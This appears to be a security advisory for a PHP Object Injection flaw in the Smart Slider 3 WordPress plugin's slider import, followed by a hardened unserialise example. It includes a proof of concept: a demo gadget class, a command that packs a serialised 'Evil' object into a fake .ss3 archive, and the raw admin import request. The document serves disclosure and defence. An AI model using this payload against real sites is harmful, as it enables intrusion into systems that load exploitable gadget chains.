The plugin unserialises the content of an imported file, which could lead to PHP Object Injection issues when a user imports (intentionally or not) a malicious file and a suitable gadget chain is present on the site.
To simulate a gadget chain, put the following code in a plugin:
<?php
// Stand-in gadget: __wakeup() runs as soon as an object of this class is unserialised.
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}
Create a fake slider archive whose data entry is a serialised Evil object:
echo 'O:4:"Evil":0:{};' > data && zip EvilSlider.ss3 data
Then import the fake slider in the Smart Slider 3 dashboard; the resulting request looks like this:
POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=import&groupID=0&nextend_nonce=e771567d65 HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------304866225113075420131015772767
Content-Length: 1416
Cookie:[admin+]
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="nextend_nonce"
e771567d65
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[upload_or_local]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[import-file]"; filename="My project(2).ss3"
Content-Type: application/octet-stream
[File data]
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[local-import-file]"
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[local-import-file]"
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[delete]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[restore]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[image-mode]"
clone
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[image-mode]"
clone
-----------------------------304866225113075420131015772767--
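For contrast with the unserialise call described at the top, the following is an added illustration (not Smart Slider 3's own code) of a hypothetical import handler: the unsafe pattern next to a hardened one that refuses to instantiate any class from the imported data. Function names and the sample payloads are assumptions made for this example.

```php
<?php
// Added example, not the plugin's code. Hypothetical handler for the "data"
// entry read out of an uploaded .ss3 archive.

// Unsafe pattern: unserialize() with default options instantiates any class
// named in the payload, so a string such as 'O:4:"Evil":0:{}' runs the
// __wakeup()/__destruct() of whatever gadget class is loaded on the site.
function import_slider_unsafe(string $serialized)
{
    return unserialize($serialized);
}

// Hardened pattern: with allowed_classes => false (PHP 7.0+) every object in
// the payload becomes __PHP_Incomplete_Class and no magic method of a site
// class is ever invoked. The result is then required to be a plain array.
function import_slider_hardened(string $serialized): array
{
    $data = @unserialize($serialized, ['allowed_classes' => false]);
    if (!is_array($data)) {
        throw new InvalidArgumentException('Import data is not a plain array');
    }
    // Reject any (incomplete-class) object nested anywhere in the structure,
    // so a gadget hidden inside a legitimate-looking array is refused too.
    array_walk_recursive($data, function ($v) {
        if (is_object($v)) {
            throw new InvalidArgumentException('Objects are not allowed in import data');
        }
    });
    return $data;
}

// Constructed sample inputs for a local check.
$legit = serialize(['title' => 'My slider', 'slides' => [['id' => 1]]]);
$evil  = 'O:4:"Evil":0:{}';                       // the payload from the PoC
$mixed = serialize(['title' => 'x', 'extra' => unserialize($evil, ['allowed_classes' => false])]);

echo import_slider_hardened($legit)['title'], PHP_EOL;
foreach ([$evil, $mixed] as $payload) {
    try {
        import_slider_hardened($payload);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

A format that cannot encode objects at all (JSON via json_decode()) removes the class of bug entirely and is the preferable fix for a slider export format.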